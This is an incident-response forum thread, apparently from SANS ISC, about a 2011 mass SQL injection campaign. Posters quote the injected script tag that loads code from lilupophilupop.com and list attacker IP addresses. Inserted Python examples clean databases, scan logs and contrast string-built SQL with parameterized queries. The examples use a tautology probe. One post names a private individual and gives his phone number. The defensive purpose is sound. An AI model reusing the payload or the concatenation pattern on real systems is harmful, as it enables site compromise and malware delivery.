SANS ISC: SQL Injection Attack happening ATM SANS ISC InfoSec Forums

SQL Injection Attack happening ATM
@Sigrid Wen

ATM=At the moment

...
fmc

5 Posts
Hey All,
The package is quite vicious. For text fields large enough, the injection string is cleanable, but for small text-based fields the injection will wipe out all content in the field.
Double check that your full backups/transactions are running, as that is the only recovery if you get hit.
Anonymous
I spent 15 hours fixing my client's website 3 days ago, only to have the same thing happen again today.

"></title><script src="http://lilupophilupop.com/sl.php"></script><!-- inserted into every table column. What can I do to prevent this? I just blocked the domain name, but I still don't feel safe.
Anonymous
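The post above reports the same tag appended to every text column, and an earlier reply notes that wide fields can be cleaned while narrow ones lose their content. The following is an added example, not code from the thread or from SANS ISC: it strips the quoted tag from every TEXT column of a table and separately flags cells that hold only a truncated head of the tag, which is the case where the original value is gone and a backup is the only recovery. It uses an in-memory SQLite database with constructed rows as a stand-in for the MSSQL tables discussed here; the table and column names are assumptions.

```python
import sqlite3

# The string the poster found in every column, copied from the post above.
INJECTED = '"></title><script src="http://lilupophilupop.com/sl.php"></script><!--'


def make_sample_db():
    """Constructed sample data: two wide columns and one narrow column, all hit."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, code TEXT)")
    rows = [
        # Wide columns keep their content with the tag appended; the narrow
        # 'code' column holds only the first 8 characters of the tag.
        ("Welcome" + INJECTED, "Opening day notes" + INJECTED, INJECTED[:8]),
        ("Second post" + INJECTED, "More notes" + INJECTED, "ab"),
    ]
    conn.executemany("INSERT INTO news (title, body, code) VALUES (?, ?, ?)", rows)
    conn.commit()
    return conn


def clean_cell(value, tag=INJECTED, min_partial=4):
    """Return (cleaned_value, status); status is 'clean', 'stripped' or 'damaged'."""
    if not isinstance(value, str):
        return value, "clean"
    if tag in value:
        # Full tag present: removing it restores the original content.
        return value.replace(tag, ""), "stripped"
    # A narrow column may contain only the first bytes of the tag. Strip the
    # fragment, but report the cell as damaged: whatever preceded it is lost.
    for n in range(len(tag) - 1, min_partial - 1, -1):
        if value.endswith(tag[:n]):
            return value[:-n], "damaged"
    return value, "clean"


def clean_table(conn, table):
    """Clean every TEXT column of `table`; return counts of stripped/damaged cells."""
    # Identifiers come from the schema via PRAGMA, not from user input, so
    # interpolating them here is safe; the values still go through parameters.
    cols = [r[1] for r in conn.execute(f"PRAGMA table_info({table})") if r[2].upper() == "TEXT"]
    summary = {"stripped": 0, "damaged": 0}
    for col in cols:
        for row_id, value in conn.execute(f"SELECT id, {col} FROM {table}").fetchall():
            new_value, status = clean_cell(value)
            if status != "clean":
                summary[status] += 1
                conn.execute(f"UPDATE {table} SET {col} = ? WHERE id = ?", (new_value, row_id))
    conn.commit()
    return summary


def fetch_row(conn, row_id):
    return conn.execute("SELECT title, body, code FROM news WHERE id = ?", (row_id,)).fetchone()


if __name__ == "__main__":
    db = make_sample_db()
    print(clean_table(db, "news"))   # {'stripped': 4, 'damaged': 1}
    print(fetch_row(db, 1))          # ('Welcome', 'Opening day notes', '')
```

Run the cleanup against a copy first and compare the "damaged" count with the rows in your last good backup; those cells cannot be reconstructed from the live data.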
The reason for the problem is still not clear to me.
Who can explain please:
1. Is it a vulnerability in MSSQL server or simple SQL injection - bug in website sources?
2. As far as I understand now it is vulnerability in MSSQL server - so do they plan to release a patch?
Anonymous
@Andy - Unfortunately you will need to go through your log files and try to identify the actual page that has been used to inject. Search your web logs for 736574 or any request that is quite long. I also look for 500 error messages, as there is a likelihood that the SQL injection caused the server to have a little fit and throw a 500 error. To look for long entries I used awk ( cat filename | awk {'if(length($0)>1500) { print $0}'} )

Then once you have identified it you will need to look what in the page is making it vulnerable and fix the code. A simple length check is a good start, but proper validation is the only way you will address this issue.

Mark
Mark

391 Posts
ISC Handler
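The three log checks Mark lists (the hex marker 736574, unusually long requests, and 500 responses) can be run together over IIS logs. The script below is an added example, not code from the thread or from SANS ISC; it scans constructed W3C-style log lines (not real traffic, with a placeholder hex blob standing in for the encoded statement), reports which check fired on each line, and collects the client addresses involved. The field layout it assumes is the common one of date, time, server IP, method, URI stem, query, port, username, client IP, user agent, status.

```python
from dataclasses import dataclass

HEX_MARKER = "736574"   # hex for "set", the marker from Mark's post above
LONG_REQUEST = 1500     # same threshold as the awk one-liner above

# Constructed sample log lines; the third carries a long hex blob in the query.
SAMPLE_LOG = "\n".join([
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2011-12-08 10:01:02 10.0.0.5 GET /products.asp id=12 80 - 203.0.113.9 Mozilla/5.0 200",
    "2011-12-08 10:01:09 10.0.0.5 GET /search.asp q=widgets 80 - 203.0.113.9 Mozilla/5.0 200",
    "2011-12-08 10:02:30 10.0.0.5 GET /products.asp "
    + "id=0x4445434c415245" + HEX_MARKER + "41" * 800
    + " 80 - 198.51.100.7 Mozilla/4.0 500",
    "2011-12-08 10:02:31 10.0.0.5 GET /products.asp id=13 80 - 203.0.113.9 Mozilla/5.0 200",
])


@dataclass
class Finding:
    line_no: int
    client_ip: str
    reasons: tuple


def scan_iis_log(text, long_request=LONG_REQUEST, marker=HEX_MARKER):
    """Return a Finding for every line that trips at least one of the three checks."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):   # skip blank lines and W3C directives
            continue
        fields = line.split()
        status = fields[-1]
        client_ip = fields[8] if len(fields) > 8 else "?"
        reasons = []
        if marker in line.lower():
            reasons.append("hex marker")
        if len(line) > long_request:
            reasons.append("long request")
        if status == "500":
            reasons.append("status 500")
        if reasons:
            findings.append(Finding(line_no, client_ip, tuple(reasons)))
    return findings


def suspicious_ips(findings):
    """Distinct client addresses behind the flagged lines, sorted."""
    return sorted({f.client_ip for f in findings})


if __name__ == "__main__":
    hits = scan_iis_log(SAMPLE_LOG)
    for hit in hits:
        print(f"line {hit.line_no} from {hit.client_ip}: {', '.join(hit.reasons)}")
    print(suspicious_ips(hits))
```

The line that fires all three checks is the one to open up: its URI stem names the page whose input is reaching the database unvalidated, which is the fix Mark describes next. On a real log, pipe the file in with `scan_iis_log(open(path).read())`; the pure-awk equivalent for the length check alone is `awk 'length($0) > 1500' filename`.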
@grep
1. Is it a vulnerability in MSSQL server or simple SQL injection - bug in website sources?
--- It is not a vulnerability in the actual server, it is an issue with the code on the page or in the backend (some compromised sites were using stored procedures). Basic validation of input will fix the problem.

2. As far as I understand now it is vulnerability in MSSQL server - so do they plan to release a patch?
--- As mentioned above it is an issue with the code, not the product. Just as a word of caution, just because the incidents I am aware of were MSSQL related does not mean that this is limited to MSSQL. It is very possible that other products are being attacked; I just haven't had anyone say "my insert fav DB product" has been affected.

Mark H
Mark

391 Posts
ISC Handler
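Mark's answer is that the fix sits in the page code, and the earlier reply names the two layers: a length check and proper validation. The example below is added here and is not code from the thread or from SANS ISC. It puts the vulnerable pattern (building the statement by string concatenation) next to the corrected one (a parameterized query) and adds the input check in front of both, using an in-memory SQLite database and constructed rows in place of the MSSQL back end discussed above; the table, column and function names are assumptions.

```python
import sqlite3

# A classic tautology input, used here only to show the two code paths diverge.
PROBE = "' OR '1'='1"


def make_db():
    """Constructed sample table standing in for the site's product catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany(
        "INSERT INTO products (name, description) VALUES (?, ?)",
        [("widget", "a widget"), ("gadget", "a gadget"), ("gizmo", "a gizmo")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """The broken pattern: the input is spliced into the SQL text itself."""
    sql = "SELECT name FROM products WHERE name = '" + term + "'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, term):
    """The fix: the value travels separately and can never alter the statement."""
    return [row[0] for row in conn.execute("SELECT name FROM products WHERE name = ?", (term,))]


def validate_term(term, max_len=64):
    """Length check plus an allow-list of what this field legitimately needs.

    Validation is defence in depth in front of parameterization, not a
    replacement for it; the allow-list here is an assumption about the field.
    """
    if not isinstance(term, str) or len(term) > max_len or not term.isalnum():
        raise ValueError("invalid search term")
    return term


def search_hardened(conn, term):
    """Validation first, then the parameterized query."""
    return search_parameterized(conn, validate_term(term))


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, PROBE))       # every row comes back
    print(search_parameterized(db, PROBE))    # [] - treated as a literal name
    print(search_hardened(db, "widget"))      # ['widget']
```

The same split applies to stored procedures: a procedure that assembles and executes dynamic SQL from its arguments is as exposed as the page code, while one that uses its parameters only as values is not.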
Mark, thank you!
Could you please advise
a) how to find the place in the code where exactly vulnerability exists?
b) what exactly should be validated on the input?
Mark
3 Posts
a) more exactly - I mean how to find specific page/input where vulnerability exists?
Mark
3 Posts
@Grep
I just updated the diary entry with some additional info. If that doesn't help you, zip up the log file for the day of the compromise and send it to markh.isc at gmail.com or put it somewhere where I can download it from and I'll take a quick look.

M
Mark

391 Posts
ISC Handler
@Grep
I think it would be a page with a form on it or a page that uses a query string.
Mark
2 Posts
@Andy

- https://blogs.msdn.com/themes/blogs/generic/post.aspx?WeblogApp=alexhomer&y=2011&m=02&d=06&WeblogPostName=blocking-malware-domains-in-isa-2006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will not be blocked when you use just domain name lists..."

Most of the time, the morons calm it down just a bit until the dust settles.
Not the case here:
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-09, and the last time suspicious content was found was on 2011-12-09... Over the past 90 days, we found 15 site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com... that appeared to function as intermediaries for the infection of 160 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 21 site(s), including, for example, sweepstakesandcontestsnow .com/, that infected 761 other site(s)..."
. [ 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) ]
.
Jack

160 Posts
Updated: Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-11, and the last time suspicious content was found was on 2011-12-11... Over the past 90 days, we found -15- site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com, that appeared to function as intermediaries for the infection of -190- other site(s)... We found -30- site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com, that infected -2122- other site(s)..."
- http://blog.dynamoo.com/2010/10/evil-netwo...specialist.html
11 October 2010 - "...blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea..."
inetnum: 194.28.112.0 - 194.28.115.255
descr: Specialist
- https://blogs.msdn.com/themes/blogs/generic/post.aspx?WeblogApp=alexhomer&y=2011&m=02&d=06&WeblogPostName=blocking-malware-domains-in-isa-2006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will -not- be blocked when you use just domain name lists..."
.
Jack

160 Posts
Noticed that rogersplus.ca has been hit by this. Over 2040 hits for hXXp://lilupophilupop.com/sl.php within the domain.
Though it appears the link is now returning a 404 error.
Jack
1 Posts
Wanted to let everyone know that I found 3 more unique IPs in my IIS logs today after finding over 50 SQL injection attempts for these troublemakers.

They are:
173.212.195.36
173.212.213.36
66.197.227.136

And FYI, the string posted above by Mark H. is what helped me find them. So thank you.

My only other question is why isn't anyone showing up on the doorstep of S. Matthew Arcus in Scranton, PA, phone 570-343-8551. ARIN says that all three of the above IP addresses belong to him?
Jack
1 Posts
Just an FYI that I linked to this page in a blog post: What an IDS analyst does..(for non-geeks). Any feedback appreciated. It is http://idstales.ca/stories.php
Jack
1 Posts
We were infected with this attack twice.

The first occurrence was on 12/08/11 and somewhat surprisingly, we could find no record of the attack point in the IIS access logs.

The second occurrence was on 12/13/11 and in that instance, we did find the entry point in the logs with the signature mentioned in this report.

We then “replayed” the injection in a secure test environment and what we found in our case was that the SQL statement it runs can take hours to actually complete. Until the SQL statement completes, IIS was waiting to write the entry to the access log because it didn’t have a response yet.

Our theory is that in the first attack, we saw evidence of the database corruption while the SQL was still running and promptly shut down IIS and then SQL Server, causing no log entry to be written into the IIS access logs. During the second attack, we also found evidence of the corruption very quickly, but in that instance, SQL Server was shut down before IIS and therefore IIS was able to log the entry in the access logs.

Our second attack was from the 173.212.195.36 IP mentioned in a previous comment as being registered to the guy in Scranton, PA.
Jack
1 Posts
